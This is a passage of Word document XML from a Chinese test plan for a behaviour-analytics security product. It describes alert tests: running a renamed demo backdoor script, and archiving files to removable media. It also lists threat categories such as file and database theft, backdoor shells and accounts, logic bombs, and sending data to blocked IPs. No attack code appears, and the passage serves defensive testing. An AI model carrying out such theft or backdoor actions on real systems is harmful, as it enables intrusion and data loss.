          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="79F097B0" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="693F810E"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4446D46C" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>概述：一台正常运行的服务器，只要给出最近足量的数据，其中就能包含当前机器中所有运行时态正常执行的各类程序，脚本，网络连接等</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C500102" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>在极端情况下，因内外部威胁原因，攻击者在获取到相关shell权限后，需要执行新的未知的攻击程序/网络连接/脚本等，用户行为分析能够通过之前基于数据服务程序建模结果对未知的软件/行为/脚本进行告警。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54439865" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>测试过程：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="403A3F78" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="23"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:ind w:firstLineChars="200" w:firstLine="360"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>使用在后门攻击演示中的测试攻击脚本，若此脚本已经能够触发未知软件告警，首先在用户行为分析 Web页面中进行误报标记，并进行提升训练。（同时演示误报标记和提升训练功能）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15A1C433" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="23"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:ind w:firstLineChars="200" w:firstLine="360"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>重命名backdoor.sh成unknowattack.sh，并执行，以触发告警（能够使用</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>任意新</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>的第三</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>方程序演示此</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>功能，二进制执行程序和脚本皆可）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="189A5EFF" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1DF83FDD"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57B6BDC0"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hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>WebUI</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>或微信告警系统</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>中出现告警</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="1C7D4B2E" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="753B13DB"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7675B3BD" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0DB9DE62" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-0"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E9511B2" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="303" w:name="_Toc2066524722"/>
      <w:bookmarkStart w:id="304" w:name="_Toc36487932"/>
      <w:r w:rsidRPr="00536672">
        <w:t>异常敏感操作行为</w:t>
      </w:r>
      <w:bookmarkEnd w:id="303"/>
      <w:bookmarkEnd w:id="30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14F21050" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27D4A711"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241A0301" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>异常敏感操作检测</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="41777CF6" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25688376" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>测试工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6833" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35881AC3" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>无需工具，安装测试过程要求手动操作即可</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="2CE07E1D" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2001C635"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7F1D94C0" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>用户行为分析各组件安全完毕，实时检测数据流正常</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="4D1111A4" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B52FBD2"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79938698" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>概述：在极端情况下，因内外部威胁原因，攻击者在获取到相关shell权限后，只使用系统自带的正常程序进行攻击。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B9F7739" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>常见的异常行为可以归纳成如下几项：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FAD7EE1" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="24"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:ind w:left="0" w:firstLineChars="200" w:firstLine="360"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>非正常时间的操作执行；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DE947EA" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="24"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:ind w:left="0" w:firstLineChars="200" w:firstLine="360"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>单位时间片内的操作命令次数统计异常；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5978D577" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="24"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:ind w:left="0" w:firstLineChars="200" w:firstLine="360"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>时间片内的异常操作模式；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BA220EF" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>在现实的场景中，异常情况往往不是真实的威胁行为，而是因为业务场景的复杂行和人类行为的不可预测性导致的，在</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>真实业务</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>场景中，异常威胁攻击类别如下：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65D6171C" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="25"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:ind w:left="0" w:firstLineChars="200" w:firstLine="360"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>机密文件窃取</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61418667" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="25"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:ind w:left="0" w:firstLineChars="200" w:firstLine="360"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>数据库敏感数据窃取</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29CE1993" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="25"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:ind w:left="0" w:firstLineChars="200" w:firstLine="360"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>敏感数据/文件非法篡改（删除）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62B7F56A" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="25"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:ind w:left="0" w:firstLineChars="200" w:firstLine="360"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>后门攻击（非法网络链路，非法shell接口，非法账户）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="464EDB9E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="25"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:ind w:left="0" w:firstLineChars="200" w:firstLine="360"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>潜伏炸弹</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A4C1CC1" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="25"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:ind w:left="0" w:firstLineChars="200" w:firstLine="360"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>禁止向特定I</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>P</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>地址发送敏感数据</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34F80895" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>以上典型情况有因内部威胁导致的数据窃取，当前演示方案同时基于此场景进</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>行设计。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A6E0842" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>用户行为分析使用采用机器学习算法基于用户行为模式进行异常行为检测，再通过用户状态行为跟踪的方式来对检测的异常进行威胁甄别，当机器学习算法引擎报异常且用户状态被标记</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>成微信敏感</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>时，进行告警。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A3F946E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="542E329A" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:jc w:val="left"/>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测试过程：在被保护机器上对一测试目录进行打包压缩，并复制移动到移动介质上，随后在相关机器上任意执行命令，确保执行的命令模式和被保护机器中当前登录用户的使用模式迥异，以此触发异常威胁告警。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B581457" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>另外，可通过策略设置限制对特定的ip地址发送敏感数据，一旦有操作违反该策略，用户行为分析可马上发现并报警。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="598AE5D2" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22DE97B9"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506F5133"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hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>WebUI</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>或微信告警系统</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>中出现告警</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="1030156F" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="409F9064"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447323C5" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1FB30723" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-1"/>
      </w:pPr>
      <w:bookmarkStart w:id="305" w:name="_Toc36487933"/>
